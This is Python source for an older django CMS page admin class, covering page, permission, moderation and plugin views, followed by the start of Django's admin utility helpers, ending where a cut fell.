if settings.CMS_PERMISSION and isinstance(inline, PagePermissionInlineAdmin) and not isinstance(inline, ViewRestrictionInlineAdmin):
if "recover" in request.path or "history" in request.path: #do not display permissions in recover mode
continue
if obj and not obj.has_change_permissions_permission(request):
continue
elif not obj:
try:
permissions.get_user_permission_level(request.user)
except NoPermissionsException:
continue
yield inline.get_formset(request, obj)
def add_view(self, request, form_url='', extra_context=None):
extra_context = extra_context or {}
if settings.CMS_MODERATOR and 'target' in request.GET and 'position' in request.GET:
moderation_required = moderator.will_require_moderation(
request.GET['target'], request.GET['position']
)
extra_context.update({
'moderation_required': moderation_required,
'moderation_level': _('higher'),
'show_save_and_continue':True,
})
language = get_language_from_request(request)
extra_context.update({
'language': language,
})
return super(PageAdmin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, extra_context=None):
"""
The 'change' admin view for the Page model.
"""
try:
obj = self.model.objects.get(pk=object_id)
except self.model.DoesNotExist:
# Don't raise Http404 just yet, because we haven't checked
# permissions yet. We don't want an unauthenticated user to be able
# to determine whether a given object exists.
obj = None
else:
selected_template = get_template_from_request(request, obj)
moderation_level, moderation_required = moderator.get_test_moderation_level(obj, request.user)
# if there is a delete request for this page
moderation_delete_request = (settings.CMS_MODERATOR and
obj.pagemoderatorstate_set.get_delete_actions(
).count())
#activate(user_lang_set)
extra_context = {
'placeholders': plugins.get_placeholders(selected_template),
'page': obj,
'CMS_PERMISSION': settings.CMS_PERMISSION,
'CMS_MODERATOR': settings.CMS_MODERATOR,
'ADMIN_MEDIA_URL': settings.ADMIN_MEDIA_PREFIX,
'has_change_permissions_permission': obj.has_change_permissions_permission(request),
'has_moderate_permission': obj.has_moderate_permission(request),
'moderation_level': moderation_level,
'moderation_required': moderation_required,
'moderator_should_approve': moderator.moderator_should_approve(request, obj),
'moderation_delete_request': moderation_delete_request,
'show_delete_translation': len(obj.get_languages()) > 1,
'current_site_id': settings.SITE_ID,
}
extra_context = self.update_language_tab_context(request, obj, extra_context)
tab_language = request.GET.get("language", None)
response = super(PageAdmin, self).change_view(request, object_id, extra_context)
if tab_language and response.status_code == 302 and response._headers['location'][1] == request.path :
location = response._headers['location']
response._headers['location'] = (location[0], "%s?language=%s" % (location[1], tab_language))
return response
def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None):
# add context variables
filled_languages = []
if obj:
filled_languages = [t[0] for t in obj.title_set.filter(title__isnull=False).values_list('language')]
allowed_languages = [l[0] for l in self._get_site_languages(obj)]
context.update({
'filled_languages': [l for l in filled_languages if l in allowed_languages],
})
return super(PageAdmin, self).render_change_form(request, context, add, change, form_url, obj)
def _get_site_languages(self, obj):
site_id = None
if obj:
site_id = obj.site_id
languages = []
if site_id and site_id in settings.CMS_SITE_LANGUAGES:
for lang in settings.CMS_SITE_LANGUAGES[site_id]:
lang_label = dict(settings.CMS_LANGUAGES).get(lang, dict(settings.LANGUAGES).get(lang, lang))
languages.append((lang, lang_label))
else:
languages = settings.CMS_LANGUAGES
return languages
def update_language_tab_context(self, request, obj, context=None):
if not context:
context = {}
language = get_language_from_request(request, obj)
languages = self._get_site_languages(obj)
context.update({
'language': language,
'language_tabs': languages,
'show_language_tabs': len(languages) > 1,
})
return context
def response_change(self, request, obj):
"""Called always when page gets changed, call save on page, there may be
some new stuff, which should be published after all other objects on page
are collected.
"""
if settings.CMS_MODERATOR:
# save the object again, so all the related changes to page model
# can be published if required
obj.save()
return super(PageAdmin, self).response_change(request, obj)
def has_add_permission(self, request):
"""
Return true if the current user has permission to add a new page.
"""
if settings.CMS_PERMISSION:
return permissions.has_page_add_permission(request)
return super(PageAdmin, self).has_add_permission(request)
def has_change_permission(self, request, obj=None):
"""
Return true if the current user has permission on the page.
Return the string 'All' if the user has all rights.
"""
if settings.CMS_PERMISSION:
if obj:
return obj.has_change_permission(request)
else:
return permissions.has_page_change_permission(request)
return super(PageAdmin, self).has_change_permission(request, obj)
def has_delete_permission(self, request, obj=None):
"""
Returns True if the given request has permission to change the given
Django model instance. If CMS_PERMISSION are in use also takes look to
object permissions.
"""
if settings.CMS_PERMISSION and obj is not None:
return obj.has_delete_permission(request)
return super(PageAdmin, self).has_delete_permission(request, obj)
def has_recover_permission(self, request):
"""
Returns True if the use has the right to recover pages
"""
if not "reversion" in settings.INSTALLED_APPS:
return False
user = request.user
if user.is_superuser:
return True
try:
perm = GlobalPagePermission.objects.get(user=user)
if perm.can_recover:
return True
except:
pass
return False
def changelist_view(self, request, extra_context=None):
"The 'change list' admin view for this model."
from django.contrib.admin.views.main import ERROR_FLAG
opts = self.model._meta
app_label = opts.app_label
if not self.has_change_permission(request, None):
raise PermissionDenied
try:
if hasattr(self, 'list_editable'):# django 1.1
cl = CMSChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter,
self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self.list_editable, self)
else:# django 1.0.2
cl = CMSChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter,
self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self)
except IncorrectLookupParameters:
# Wacky lookup parameters were given, so redirect to the main
# changelist page, without parameters, and pass an 'invalid=1'
# parameter via the query string. If wacky parameters were given and
# the 'invalid=1' parameter was already in the query string, something
# is screwed up with the database, so display an error page.
if ERROR_FLAG in request.GET.keys():
return render_to_response('admin/invalid_setup.html', {'title': _('Database error')})
return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')
cl.set_items(request)
site_id = request.GET.get('site__exact', None)
if site_id is None:
site_id = Site.objects.get_current().pk
site_id = int(site_id)
# languages
languages = []
if site_id and site_id in settings.CMS_SITE_LANGUAGES:
languages = settings.CMS_SITE_LANGUAGES[site_id]
else:
languages = [x[0] for x in settings.CMS_LANGUAGES]
context = {
'title': cl.title,
'is_popup': cl.is_popup,
'cl': cl,
'opts':opts,
'has_add_permission': self.has_add_permission(request),
'root_path': self.admin_site.root_path,
'app_label': app_label,
'CMS_MEDIA_URL': settings.CMS_MEDIA_URL,
'softroot': settings.CMS_SOFTROOT,
'CMS_PERMISSION': settings.CMS_PERMISSION,
'CMS_MODERATOR': settings.CMS_MODERATOR,
'has_recover_permission': 'reversion' in settings.INSTALLED_APPS and self.has_recover_permission(request),
'DEBUG': settings.DEBUG,
'site_languages': languages,
}
if 'reversion' in settings.INSTALLED_APPS:
context['has_change_permission'] = self.has_change_permission(request)
context.update(extra_context or {})
return render_to_response(self.change_list_template or [
'admin/%s/%s/change_list.html' % (app_label, opts.object_name.lower()),
'admin/%s/change_list.html' % app_label,
'admin/change_list.html'
], context, context_instance=RequestContext(request))
def recoverlist_view(self, request, extra_context=None):
if not self.has_recover_permission(request):
raise PermissionDenied
return super(PageAdmin, self).recoverlist_view(request, extra_context)
def recover_view(self, request, version_id, extra_context=None):
if not self.has_recover_permission(request):
raise PermissionDenied
extra_context = self.update_language_tab_context(request, None, extra_context)
return super(PageAdmin, self).recover_view(request, version_id, extra_context)
def revision_view(self, request, object_id, version_id, extra_context=None):
if not self.has_change_permission(request, Page.objects.get(pk=object_id)):
raise PermissionDenied
extra_context = self.update_language_tab_context(request, None, extra_context)
response = super(PageAdmin, self).revision_view(request, object_id, version_id, extra_context)
return response
def history_view(self, request, object_id, extra_context=None):
if not self.has_change_permission(request, Page.objects.get(pk=object_id)):
raise PermissionDenied
extra_context = self.update_language_tab_context(request, None, extra_context)
return super(PageAdmin, self).history_view(request, object_id, extra_context)
def render_revision_form(self, request, obj, version, context, revert=False, recover=False):
# reset parent to null if parent is not found
if version.field_dict['parent']:
try:
Page.objects.get(pk=version.field_dict['parent'])
except:
if revert and obj.parent_id != int(version.field_dict['parent']):
version.field_dict['parent'] = obj.parent_id
if recover:
obj.parent = None
obj.parent_id = None
version.field_dict['parent'] = None
obj.version = version
return super(PageAdmin, self).render_revision_form(request, obj, version, context, revert, recover)
@transaction.commit_on_success
def move_page(self, request, page_id, extra_context=None):
"""
Move the page to the requested target, at the given position
"""
target = request.POST.get('target', None)
position = request.POST.get('position', None)
if target is None or position is None:
return HttpResponseRedirect('../../')
try:
page = self.model.objects.get(pk=page_id)
target = self.model.objects.get(pk=target)
except self.model.DoesNotExist:
return HttpResponseBadRequest("error")
# does he haves permissions to do this...?
if not page.has_move_page_permission(request) or \
not target.has_add_permission(request):
return HttpResponseForbidden("Denied")
# move page
page.move_page(target, position)
if "reversion" in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(page)
return admin_utils.render_admin_menu_item(request, page)
def get_permissions(self, request, page_id):
page = get_object_or_404(Page, id=page_id)
can_change_list = Page.permissions.get_change_id_list(request.user, page.site_id)
global_page_permissions = GlobalPagePermission.objects.filter(sites__in=[page.site_id])
page_permissions = PagePermission.objects.for_page(page)
all_permissions = list(global_page_permissions) + list(page_permissions)
# does he can change global permissions ?
has_global = permissions.has_global_change_permissions_permission(request.user)
permission_set = []
for permission in all_permissions:
if isinstance(permission, GlobalPagePermission):
if has_global:
permission_set.append([(True, True), permission])
else:
permission_set.append([(True, False), permission])
else:
if can_change_list == PagePermissionsPermissionManager.GRANT_ALL:
can_change = True
else:
can_change = permission.page_id in can_change_list
permission_set.append([(False, can_change), permission])
context = {
'page': page,
'permission_set': permission_set,
}
return render_to_response('admin/cms/page/permissions.html', context)
@transaction.commit_on_success
def copy_page(self, request, page_id, extra_context=None):
"""
Copy the page and all its plugins and descendants to the requested target, at the given position
"""
context = {}
page = Page.objects.get(pk=page_id)
target = request.POST.get('target', None)
position = request.POST.get('position', None)
site = request.POST.get('site', None)
if target is not None and position is not None and site is not None:
try:
target = self.model.objects.get(pk=target)
# does he have permissions to copy this page under target?
assert target.has_add_permission(request)
site = Site.objects.get(pk=site)
except (ObjectDoesNotExist, AssertionError):
return HttpResponse("error")
#context.update({'error': _('Page could not been moved.')})
else:
kwargs = {
'copy_permissions': request.REQUEST.get('copy_permissions', False),
'copy_moderation': request.REQUEST.get('copy_moderation', False),
}
page.copy_page(target, site, position, **kwargs)
return HttpResponse("ok")
context.update(extra_context or {})
return HttpResponseRedirect('../../')
def get_moderation_states(self, request, page_id):
"""Returns moderation messsages. Is loaded over ajax to inline-group
element in change form view.
"""
page = get_object_or_404(Page, id=page_id)
if not page.has_moderate_permission(request):
raise Http404()
context = {
'page': page,
}
return render_to_response('admin/cms/page/moderation_messages.html', context)
@transaction.commit_on_success
def approve_page(self, request, page_id):
"""Approve changes on current page by user from request.
"""
#TODO: change to POST method !! get is not safe
page = get_object_or_404(Page, id=page_id)
if not page.has_moderate_permission(request):
raise Http404()
moderator.approve_page(request, page)
# Django SQLite bug. Does not convert to string the lazy instances
from django.utils.translation import ugettext as _
self.message_user(request, _('Page was successfully approved.'))
if 'node' in request.REQUEST:
# if request comes from tree..
return admin_utils.render_admin_menu_item(request, page)
referer = request.META.get('HTTP_REFERER', reverse('admin:cms_page_changelist'))
path = '../../'
if 'admin' not in referer:
path = '%s?edit-off' % referer.split('?')[0]
return HttpResponseRedirect( path )
@transaction.commit_on_success
def publish_page(self, request, page_id):
page = get_object_or_404(Page, id=page_id)
# ensure user has permissions to publish this page
if not page.has_moderate_permission(request):
return HttpResponseForbidden("Denied")
page.publish()
referer = request.META.get('HTTP_REFERER', '')
path = '../../'
# TODO: use admin base here!
if 'admin' not in referer:
path = '%s?edit-off' % referer.split('?')[0]
return HttpResponseRedirect( path )
def delete_view(self, request, object_id, *args, **kwargs):
"""If page is under modaretion, just mark this page for deletion = add
delete action to page states.
"""
page = get_object_or_404(Page, id=object_id)
if not self.has_delete_permission(request, page):
raise PermissionDenied
if settings.CMS_MODERATOR and page.is_under_moderation():
# don't perform a delete action, just mark page for deletion
page.force_moderation_action = PageModeratorState.ACTION_DELETE
page.moderator_state = Page.MODERATOR_NEED_DELETE_APPROVEMENT
page.save()
if not self.has_change_permission(request, None):
return HttpResponseRedirect("../../../../")
return HttpResponseRedirect("../../")
response = super(PageAdmin, self).delete_view(request, object_id, *args, **kwargs)
return response
@create_on_success
def delete_translation(self, request, object_id, extra_context=None):
language = get_language_from_request(request)
opts = Page._meta
titleopts = Title._meta
app_label = titleopts.app_label
pluginopts = CMSPlugin._meta
try:
obj = self.queryset(request).get(pk=unquote(object_id))
except self.model.DoesNotExist:
# Don't raise Http404 just yet, because we haven't checked
# permissions yet. We don't want an unauthenticated user to be able
# to determine whether a given object exists.
obj = None
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(
_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_unicode(opts.verbose_name),
'key': escape(object_id)
})
if not len(obj.get_languages()) > 1:
raise Http404(_('There only exists one translation for this page'))
titleobj = get_object_or_404(Title, page__id=object_id, language=language)
saved_plugins = CMSPlugin.objects.filter(placeholder__page__id=object_id, language=language)
if django.VERSION[1] > 2: # pragma: no cover
# WARNING: Django 1.3 is not officially supported yet!
using = router.db_for_read(self.model)
kwargs = {
'admin_site': self.admin_site,
'user': request.user,
'using': using
}
else:
kwargs = {
'admin_site': self.admin_site,
'user': request.user,
}
deleted_objects, perms_needed = get_deleted_objects(
[titleobj],
titleopts,
**kwargs
)[:2]
to_delete_plugins, perms_needed_plugins = get_deleted_objects(
saved_plugins,
pluginopts,
**kwargs
)[:2]
deleted_objects.append(to_delete_plugins)
perms_needed = set( list(perms_needed) + list(perms_needed_plugins) )
if request.method == 'POST':
if perms_needed:
raise PermissionDenied
message = _('Title and plugins with language %(language)s was deleted') % {
'language': [name for code, name in settings.CMS_LANGUAGES if code == language][0]
}
self.log_change(request, titleobj, message)
self.message_user(request, message)
titleobj.delete()
for p in saved_plugins:
p.delete()
public = obj.publisher_public
if public:
public.save()
if "reversion" in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(obj)
if not self.has_change_permission(request, None):
return HttpResponseRedirect("../../../../")
return HttpResponseRedirect("../../")
context = {
"title": _("Are you sure?"),
"object_name": force_unicode(titleopts.verbose_name),
"object": titleobj,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"opts": titleopts,
"root_path": self.admin_site.root_path,
"app_label": app_label,
}
context.update(extra_context or {})
context_instance = template.RequestContext(request, current_app=self.admin_site.name)
return render_to_response(self.delete_confirmation_template or [
"admin/%s/%s/delete_confirmation.html" % (app_label, titleopts.object_name.lower()),
"admin/%s/delete_confirmation.html" % app_label,
"admin/delete_confirmation.html"
], context, context_instance=context_instance)
def remove_delete_state(self, request, object_id):
"""Remove all delete action from page states, requires change permission
"""
page = get_object_or_404(Page, id=object_id)
if not self.has_change_permission(request, page):
raise PermissionDenied
page.pagemoderatorstate_set.get_delete_actions().delete()
page.moderator_state = Page.MODERATOR_NEED_APPROVEMENT
page.save()
return HttpResponseRedirect("../../%d/" % page.id)
def preview_page(self, request, object_id):
"""Redirecting preview function based on draft_id
"""
page = get_object_or_404(Page, id=object_id)
attrs = "?preview=1"
if request.REQUEST.get('public', None):
if not page.publisher_public_id:
raise Http404
page = page.publisher_public
else:
attrs += "&draft=1"
url = page.get_absolute_url() + attrs
site = Site.objects.get_current()
if not site == page.site:
url = "http%s://%s%s" % ('s' if request.is_secure() else '',
page.site.domain, url)
return HttpResponseRedirect(url)
def change_status(self, request, page_id):
"""
Switch the status of a page
"""
if request.method != 'POST':
return HttpResponseNotAllowed
page = get_object_or_404(Page, pk=page_id)
if page.has_publish_permission(request):
page.published = not page.published
page.save()
return admin_utils.render_admin_menu_item(request, page)
else:
return HttpResponseForbidden(unicode(_("You do not have permission to publish this page")))
def change_innavigation(self, request, page_id):
"""
Switch the in_navigation of a page
"""
# why require post and still have page id in the URL???
if request.method != 'POST':
return HttpResponseNotAllowed
page = get_object_or_404(Page, pk=page_id)
if page.has_change_permission(request):
page.in_navigation = not page.in_navigation
page.save(force_state=Page.MODERATOR_NEED_APPROVEMENT)
return admin_utils.render_admin_menu_item(request, page)
return HttpResponseForbidden(_("You do not have permission to change this page's in_navigation status"))
@create_on_success
def add_plugin(self, request):
'''
Could be either a page or a parent - if it's a parent we get the page via parent.
'''
if 'history' in request.path or 'recover' in request.path:
return HttpResponse(str("error"))
if request.method != "POST":
raise Http404
plugin_type = request.POST['plugin_type']
if not has_plugin_permission(request.user, plugin_type, "add"):
return HttpResponseForbidden(ugettext('You have no permission to add a plugin'))
placeholder_id = request.POST.get('placeholder', None)
parent_id = request.POST.get('parent_id', None)
if placeholder_id:
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
else:
placeholder = None
page = None
parent = None
# page add-plugin
if page:
language = request.POST['language'] or get_language_from_request(request)
position = CMSPlugin.objects.filter(language=language, placeholder=placeholder).count()
limits = placeholder_utils.get_placeholder_conf("limits", placeholder.slot, page.get_template())
if limits:
global_limit = limits.get("global")
type_limit = limits.get(plugin_type)
if global_limit and position >= global_limit:
return HttpResponseBadRequest("This placeholder already has the maximum number of plugins")
elif type_limit:
type_count = CMSPlugin.objects.filter(language=language, placeholder=placeholder, plugin_type=plugin_type).count()
if type_count >= type_limit:
plugin_name = unicode(plugin_pool.get_plugin(plugin_type).name)
return HttpResponseBadRequest("This placeholder already has the maximum number allowed of %s plugins." % plugin_name)
# in-plugin add-plugin
elif parent_id:
parent = get_object_or_404(CMSPlugin, pk=parent_id)
placeholder = parent.placeholder
page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
if not page: # Make sure we do have a page
raise Http404
language = parent.language
position = None
# placeholder (non-page) add-plugin
else:
# do NOT allow non-page placeholders to use this method, they
# should use their respective admin!
raise Http404
if not page.has_change_permission(request):
# we raise a 404 instead of 403 for a slightly improved security
# and to be consistent with placeholder admin
raise Http404
# Sanity check to make sure we're not getting bogus values from JavaScript:
if not language or not language in [ l[0] for l in settings.LANGUAGES ]:
return HttpResponseBadRequest(ugettext("Language must be set to a supported language!"))
plugin = CMSPlugin(language=language, plugin_type=plugin_type, position=position, placeholder=placeholder)
if parent:
plugin.parent = parent
plugin.save()
if 'reversion' in settings.INSTALLED_APPS and page:
helpers.make_revision_with_plugins(page)
reversion.revision.user = request.user
plugin_name = unicode(plugin_pool.get_plugin(plugin_type).name)
reversion.revision.comment = unicode(_(u"%(plugin_name)s plugin added to %(placeholder)s") % {'plugin_name':plugin_name, 'placeholder':placeholder})
return HttpResponse(str(plugin.pk))
@create_on_success
@transaction.commit_on_success
def copy_plugins(self, request):
if 'history' in request.path or 'recover' in request.path:
return HttpResponse(str("error"))
if request.method != "POST":
raise Http404
copy_from = request.POST['copy_from']
placeholder_id = request.POST['placeholder']
placeholder = get_object_or_404(Placeholder, pk=placeholder_id)
page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
language = request.POST['language'] or get_language_from_request(request)
if not page.has_change_permission(request):
return HttpResponseForbidden(ugettext("You do not have permission to change this page"))
if not language or not language in [ l[0] for l in settings.CMS_LANGUAGES ]:
return HttpResponseBadRequest(ugettext("Language must be set to a supported language!"))
if language == copy_from:
return HttpResponseBadRequest(ugettext("Language must be different than the copied language!"))
plugins = list(placeholder.cmsplugin_set.filter(language=copy_from).order_by('tree_id', '-rght'))
# check permissions before copy the plugins:
for plugin in plugins:
if not has_plugin_permission(request.user, plugin.plugin_type, "add"):
return HttpResponseForbidden(ugettext("You do not have permission to add plugins"))
copy_plugins.copy_plugins_to(plugins, placeholder, language)
if page and "reversion" in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(page)
reversion.revision.user = request.user
reversion.revision.comment = _(u"Copied %(language)s plugins to %(placeholder)s") % {'language':dict(settings.LANGUAGES)[language], 'placeholder':placeholder}
plugin_list = CMSPlugin.objects.filter(language=language, placeholder=placeholder, parent=None).order_by('position')
return render_to_response('admin/cms/page/widgets/plugin_item.html', {'plugin_list':plugin_list}, RequestContext(request))
@create_on_success
def edit_plugin(self, request, plugin_id):
plugin_id = int(plugin_id)
if not 'history' in request.path and not 'recover' in request.path:
cms_plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
page = placeholder_utils.get_page_from_placeholder_if_exists(cms_plugin.placeholder)
instance, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
if page and not page.has_change_permission(request):
return HttpResponseForbidden(ugettext("You have no permission to change this page"))
else:
# history view with reversion
from reversion.models import Version
pre_edit = request.path.split("/edit-plugin/")[0]
version_id = pre_edit.split("/")[-1]
Version.objects.get(pk=version_id)
version = get_object_or_404(Version, pk=version_id)
rev_objs = []
for related_version in version.revision.version_set.all():
try:
rev = related_version.object_version
except models.FieldDoesNotExist:
continue
else:
rev_objs.append(rev.object)
# TODO: check permissions
for obj in rev_objs:
if obj.__class__ == CMSPlugin and obj.pk == plugin_id:
cms_plugin = obj
break
inst, plugin_admin = cms_plugin.get_plugin_instance(self.admin_site)
instance = None
if cms_plugin.get_plugin_class().model == CMSPlugin:
instance = cms_plugin
else:
for obj in rev_objs:
if hasattr(obj, "cmsplugin_ptr_id") and int(obj.cmsplugin_ptr_id) == int(cms_plugin.pk):
instance = obj
break
if not instance:
raise Http404("This plugin is not saved in a revision")
if not has_plugin_permission(request.user, cms_plugin.plugin_type, "change"):
return HttpResponseForbidden(ugettext("You have no permission to edit a plugin"))
plugin_admin.cms_plugin_instance = cms_plugin
try:
plugin_admin.placeholder = cms_plugin.placeholder # TODO: what for reversion..? should it be inst ...?
except Placeholder.DoesNotExist:
pass
if request.method == "POST":
# set the continue flag, otherwise will plugin_admin make redirect to list
# view, which actually does'nt exists
request.POST['_continue'] = True
if 'reversion' in settings.INSTALLED_APPS and ('history' in request.path or 'recover' in request.path):
# in case of looking to history just render the plugin content
context = RequestContext(request)
return render_to_response(plugin_admin.render_template, plugin_admin.render(context, instance, plugin_admin.placeholder))
if not instance:
# instance doesn't exist, call add view
response = plugin_admin.add_view(request)
else:
# already saved before, call change view
# we actually have the instance here, but since i won't override
# change_view method, is better if it will be loaded again, so
# just pass id to plugin_admin
response = plugin_admin.change_view(request, str(plugin_id))
if request.method == "POST" and plugin_admin.object_successfully_changed:
# if reversion is installed, save version of the page plugins
if 'reversion' in settings.INSTALLED_APPS and page:
helpers.make_revision_with_plugins(page)
reversion.revision.user = request.user
plugin_name = unicode(plugin_pool.get_plugin(cms_plugin.plugin_type).name)
reversion.revision.comment = ugettext(u"%(plugin_name)s plugin edited at position %(position)s in %(placeholder)s") % {
'plugin_name': plugin_name,
'position': cms_plugin.position,
'placeholder': cms_plugin.placeholder.slot
}
# read the saved object from plugin_admin - ugly but works
saved_object = plugin_admin.saved_object
context = {
'CMS_MEDIA_URL': settings.CMS_MEDIA_URL,
'plugin': saved_object,
'is_popup': True,
'name': unicode(saved_object),
"type": saved_object.get_plugin_name(),
'plugin_id': plugin_id,
'icon': force_escape(escapejs(saved_object.get_instance_icon_src())),
'alt': force_escape(escapejs(saved_object.get_instance_icon_alt())),
}
return render_to_response('admin/cms/page/plugin_forms_ok.html', context, RequestContext(request))
return response
@create_on_success
def move_plugin(self, request):
if request.method != "POST":
return HttpResponse(str("error"))
if 'history' in request.path:
return HttpResponse(str("error"))
pos = 0
page = None
success = False
if 'plugin_id' in request.POST:
plugin = CMSPlugin.objects.get(pk=int(request.POST['plugin_id']))
if not has_plugin_permission(request.user, plugin.plugin_type, "change"):
return HttpResponseForbidden()
page = plugins.get_page_from_plugin_or_404(plugin)
if not page.has_change_permission(request):
return HttpResponseForbidden(ugettext("You have no permission to change this page"))
placeholder_slot = request.POST['placeholder']
placeholders = plugins.get_placeholders(page.get_template())
if not placeholder_slot in placeholders:
return HttpResponse(str("error"))
placeholder = page.placeholders.get(slot=placeholder_slot)
plugin.placeholder = placeholder
# plugin positions are 0 based, so just using count here should give us 'last_position + 1'
position = CMSPlugin.objects.filter(placeholder=placeholder).count()
plugin.position = position
plugin.save()
success = True
if 'ids' in request.POST:
for plugin_id in request.POST['ids'].split("_"):
plugin = CMSPlugin.objects.get(pk=plugin_id)
if not has_plugin_permission(request.user, plugin.plugin_type, "change"):
return HttpResponseForbidden(ugettext("You have no permission to move a plugin"))
page = placeholder_utils.get_page_from_placeholder_if_exists(plugin.placeholder)
if not page: # use placeholderadmin instead!
raise Http404
if not page.has_change_permission(request):
return HttpResponseForbidden(ugettext("You have no permission to change this page"))
if plugin.position != pos:
plugin.position = pos
plugin.save()
pos += 1
success = True
if not success:
return HttpResponse(str("error"))
if page and 'reversion' in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(page)
reversion.revision.user = request.user
reversion.revision.comment = ugettext(u"Plugins where moved")
return HttpResponse(str("ok"))
@create_on_success
def remove_plugin(self, request):
if request.method != "POST":
raise Http404
if 'history' in request.path:
raise Http404
plugin_id = request.POST['plugin_id']
plugin = get_object_or_404(CMSPlugin, pk=plugin_id)
if not has_plugin_permission(request.user, plugin.plugin_type, "delete"):
return HttpResponseForbidden(ugettext("You have no permission to remove a plugin"))
placeholder = plugin.placeholder
page = placeholder_utils.get_page_from_placeholder_if_exists(placeholder)
if page and not page.has_change_permission(request):
raise Http404
if page and settings.CMS_MODERATOR and page.is_under_moderation():
# delete the draft version of the plugin
plugin.delete()
# set the page to require approval and save
page.moderator_state = Page.MODERATOR_NEED_APPROVEMENT
page.save()
else:
plugin.delete_with_public()
plugin_name = unicode(plugin_pool.get_plugin(plugin.plugin_type).name)
comment = ugettext(u"%(plugin_name)s plugin at position %(position)s in %(placeholder)s was deleted.") % {
'plugin_name': plugin_name,
'position': plugin.position,
'placeholder': plugin.placeholder,
}
if page and 'reversion' in settings.INSTALLED_APPS:
helpers.make_revision_with_plugins(page)
reversion.revision.user = request.user
reversion.revision.comment = comment
return HttpResponse("%s,%s" % (plugin_id, comment))
def change_moderation(self, request, page_id):
"""Called when user clicks on a moderation checkbox in tree vies, so if he
wants to add/remove/change moderation required by him. Moderate is sum of
mask values.
"""
from cms.models.moderatormodels import MASK_PAGE, MASK_CHILDREN, MASK_DESCENDANTS
if request.method != 'POST':
return HttpResponseNotAllowed
page = get_object_or_404(Page, id=page_id)
moderate = request.POST.get('moderate', None)
if moderate is not None and page.has_moderate_permission(request):
try:
moderate = int(moderate)
except:
moderate = 0
if moderate == 0:
# kill record with moderation which equals zero
try:
page.pagemoderator_set.get(user=request.user).delete()
except ObjectDoesNotExist:
pass
return admin_utils.render_admin_menu_item(request, page)
elif moderate <= MASK_PAGE + MASK_CHILDREN + MASK_DESCENDANTS:
page_moderator, created = page.pagemoderator_set.get_or_create(user=request.user)
# split value to attributes
page_moderator.set_decimal(moderate)
page_moderator.save()
return admin_utils.render_admin_menu_item(request, page)
raise Http404
def lookup_allowed(self, key, *args, **kwargs):
if key == 'site__exact':
return True
return super(PageAdmin, self).lookup_allowed(key, *args, **kwargs)
contribute_fieldsets(PageAdmin)
contribute_list_filter(PageAdmin)
admin.site.register(Page, PageAdmin)
|
|
from __future__ import unicode_literals
import datetime
import decimal
from collections import defaultdict
from django.contrib.auth import get_permission_codename
from django.core.exceptions import FieldDoesNotExist
from django.core.urlresolvers import NoReverseMatch, reverse
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.deletion import Collector
from django.db.models.sql.constants import QUERY_TERMS
from django.forms.forms import pretty_name
from django.utils import formats, six, timezone
from django.utils.encoding import force_str, force_text, smart_text
from django.utils.html import format_html
from django.utils.text import capfirst
from django.utils.translation import ungettext
def lookup_needs_distinct(opts, lookup_path):
"""
Returns True if 'distinct()' should be used to query the given lookup path.
"""
lookup_fields = lookup_path.split('__')
# Remove the last item of the lookup path if it is a query term
if lookup_fields[-1] in QUERY_TERMS:
lookup_fields = lookup_fields[:-1]
# Now go through the fields (following all relations) and look for an m2m
for field_name in lookup_fields:
field = opts.get_field(field_name)
if hasattr(field, 'get_path_info'):
# This field is a relation, update opts to follow the relation
path_info = field.get_path_info()
opts = path_info[-1].to_opts
if any(path.m2m for path in path_info):
# This field is a m2m relation so we know we need to call distinct
return True
return False
def prepare_lookup_value(key, value):
"""
Returns a lookup value prepared to be used in queryset filtering.
"""
# if key ends with __in, split parameter into separate values
if key.endswith('__in'):
value = value.split(',')
# if key ends with __isnull, special case '' and the string literals 'false' and '0'
if key.endswith('__isnull'):
if value.lower() in ('', 'false', '0'):
value = False
else:
value = True
return value
def quote(s):
"""
Ensure that primary key values do not confuse the admin URLs by escaping
any '/', '_' and ':' and similarly problematic characters.
Similar to urllib.quote, except that the quoting is slightly different so
that it doesn't get automatically unquoted by the Web browser.
"""
if not isinstance(s, six.string_types):
return s
res = list(s)
for i in range(len(res)):
c = res[i]
if c in """:/_#?;@&=+$,"[]<>%\\""":
res[i] = '_%02X' % ord(c)
return ''.join(res)
def unquote(s):
"""
Undo the effects of quote(). Based heavily on urllib.unquote().
"""
mychr = chr
myatoi = int
list = s.split('_')
res = [list[0]]
myappend = res.append
del list[0]
for item in list:
if item[1:2]:
try:
myappend(mychr(myatoi(item[:2], 16)) + item[2:])
except ValueError:
myappend('_' + item)
else:
myappend('_' + item)
return "".join(res)
def flatten(fields):
"""Returns a list which is a single level of flattening of the
original list."""
flat = []
for field in fields:
if isinstance(field, (list, tuple)):
flat.extend(field)
else:
flat.append(field)
return flat
def flatten_fieldsets(fieldsets):
"""Returns a list of field names from an admin fieldsets structure."""
field_names = []
for name, opts in fieldsets:
field_names.extend(
flatten(opts['fields'])
)
return field_names
def get_deleted_objects(objs, opts, user, admin_site, using):
"""
Find all objects related to ``objs`` that should also be deleted. ``objs``
must be a homogeneous iterable of objects (e.g. a QuerySet).
Returns a nested list of strings suitable for display in the
template with the ``unordered_list`` filter.
"""
collector = NestedObjects(using=using)
collector.collect(objs)
perms_needed = set()
def format_callback(obj):
has_admin = obj.__class__ in admin_site._registry
opts = obj._meta
no_edit_link = '%s: %s' % (capfirst(opts.verbose_name),
force_text(obj))
if has_admin:
try:
admin_url = reverse('%s:%s_%s_change'
% (admin_site.name,
